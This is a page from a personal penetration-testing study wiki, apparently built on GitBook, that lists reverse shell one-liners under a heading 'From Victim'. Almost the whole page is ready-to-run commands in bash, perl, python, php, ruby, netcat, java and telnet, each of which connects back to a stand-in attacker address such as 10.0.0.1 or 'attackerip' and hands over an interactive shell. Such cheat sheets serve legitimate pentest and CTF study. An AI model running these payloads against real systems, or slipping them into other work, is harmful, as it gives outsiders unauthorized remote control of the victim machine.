🔐
SecWiki
  • Home
  • General
    • Interesting Links
      • Curriculum
    • Pentest Labs, Wargames Sites
      • How To Vulnhub with VirtualBox
  • Network Pentest
    • Courses
      • TCM - Zero to Hero
        • Week 1: Setup
          • ipsweep.sh
        • Week 2: Python 101
          • python101.py
          • bof.py
        • Week 3: Python 102
          • python102.py
          • scanner.py
        • Week 4: Passive OSINT
        • Week 5: Scanning Tools & Tactics
          • nmap
          • Nessus
          • msfconsole
        • Week 6: Enumeration
        • Week 7: Exploitation, Shells, and Some Credential Stuffing
        • Week 8: LLMNR/NBT-NS Poisoning
        • Week 9: NTLM
        • Week 10: MS17-010, GPP/cPasswords, and Kerberoasting
        • Week 11: File Transfers, Pivoting, Reporting
        • Commands
      • Penetration Testing Student (PTS)
      • OSCP Study
    • Recon
      • OSINT
    • Enumeration
      • Samba Shares
      • ProFtpd
    • Gaining Access
      • Reverse Shells
    • Privilege Escalation
      • Meterpreter
      • Spawning a TTY Shell
      • Reverse Shell Cheat Sheet
      • Cracking Hashes
      • Restricted Linux Shell Escape
      • Linux Privilege Escalation
        • lxd
        • sytemctl
      • Windows Privilege Escalation
        • Active Directory
          • What is AD?
        • User Enumeration
    • Post Exploitation
      • Cleanup
      • Maintaining Access
      • Pivoting
      • File Transfers
      • Covering Tracks
    • Vulnerabilities Checklist
    • Report Writing
  • Web App Pentest
    • Tools
      • Burp Suite
      • THC-Hydra BruteForce
    • Injection
      • SQL Injection
    • Broken Authentication
    • Sensitive Data Exposure
      • SQLite3
    • XML External Entity
      • XML Background
      • XPath Injection
    • Broken Access Control
    • Security Misconfiguration
    • Upload/Download
      • Download Bypass: Poison Null Byte
    • XSS
      • DOMXSS
      • Persistent XSS
      • Reflected (Client-side) XSS
      • Data URLs
    • Insecure Deserialization
    • Components with Known Vulnerabilities
    • Insufficient Logging and Monitoring
    • Server-Side Request Forgery (SSRF)
  • CTF
    • Intro to CTF
    • Forensics
      • Challenges
    • Steganography
    • Reverse Engineering
    • Tools
  • Network Security
    • Courses
      • Sec+
      • IBM Cybersecurity Analyst Professional Certificate
      • ISCI CNSS Course
        • Introduction to Network Security
          • Network Basics
          • Basic Network Utilities
          • The OSI Model
          • Threat Classification
          • Security Terminology
          • Approaches of Network Security
          • Law and Network Security
        • Types of Attacks
          • Denial of Service Attacks
          • Buffer Overflow Attacks
          • IP Spoofing
          • Session Hijacking
        • Fundamentals of Firewalls
          • What is a Firewall
          • Firewall Types
          • Firewall Implementation
          • Proxy Servers
          • Windows Firewalls
          • Linux Firewalls
        • Intrusion-Detection Systems
          • IDS Concepts
          • Components and Processes of IDS
          • Implementing IDS
          • Honeypots
        • Fundamentals of Encryption
          • The History of Encryption
          • Modern Encryption Methods
          • Windows and Linux Encryption
          • Hashing
          • Cracking Passwords
        • Virtual Private Networks (VPN)
          • Introduction to VPN
          • VPN Protocols
          • IPSec
          • SSL/TLS
          • VPN Solutions
        • Operating System Hardening
          • Configuring Windows
          • Configuring Linux
          • Operating System Patches
        • Virus Attacks and How to Defend
          • Virus Types and Attacks
          • Virus Scanners
          • Antivirus
          • Virus Infection and Identification
          • Trojan Horses
          • Spyware or Adware
        • Security Policies
          • User Policies Definition
          • System Administration Policies
          • Access Control
        • Assessing System Security
          • Risk Assessment
          • Conducting an Initial Assessment
          • Probing the Network
          • Vulnerabilities
          • Documenting Security
        • Security Standards
          • ISO Standards
          • NIST Standards
          • General Data Protection Regulation (GDPR)
          • PCI DSS
        • Physical Security and Recovery
          • Physical Security
          • Disaster Recovery
          • Fault Tolerance
        • Attackers Techniques
          • Hacking Preparation
          • The Attack Phase
          • Hacking Wi-Fi
    • The Web
    • The OSI Model
    • Malware Traffic Analysis with Wireshark
  • Digital Forensics
    • Autopsy - open-source digital forensics platform
  • Exploit Dev/Analysis
    • Code Review
      • Tools
    • Buffer Overflows
    • Static Analysis
      • Antivirus Scanning
      • Hashing
      • File strings
      • Packed and Obfuscated Malware
        • Demo: UPX
      • Portable Executable File Format (PE)
        • Tools
        • Linked Libraries and Functions
        • PE File Headers and Sections
  • Shell
    • ./missing-semester
      • Course overview + the shell
      • Shell Tools and Scripting
      • Editors (Vim)
      • Data Wrangling
      • Command-line Environment
    • Bash Tricks
    • .bashrc
    • Random Commands
      • sed
  • Hardware
    • NAND2Tetris
      • Boolean Functions and Gate Logic
      • Boolean Arithmetic and the ALU
      • Memory
      • Machine Language
      • Computer Architecture
      • Assembler
  • Other
    • K8s
      • Chapter 1: From Monolith to Microservices
      • Chapter 2: Container Orchestration
      • Chapter 3: Kubernetes
      • Chapter 4: Kubernetes Architecture
Powered by GitBook
On this page

Was this helpful?

  1. Network Pentest
  2. Gaining Access

Reverse Shells

PreviousGaining AccessNextPrivilege Escalation

Last updated 4 years ago

Was this helpful?

From Victim ()

#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#bash alt
exec /bin/bash 0&0 2>&0

#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

#bash alt 3
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:
while read line 0<&5; do $line 2>&5 >&5; done

#perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#perl alt
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

#perl on windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

#python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#full php shell page can be found here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

#ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

#ruby that doesn't depend on /bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

#ruby on windows
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

#netcat
nc -e /bin/sh 10.0.0.1 1234

#netcat alt
nc -c /bin/sh attackerip 4444

#netcat alt 2
/bin/sh | nc attackerip 4444

#netcat alt 3
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

#wrong version of netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

#java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

#telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

#telnet alt
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445   # Remember to listen on your machine also on port 4445/tcp

source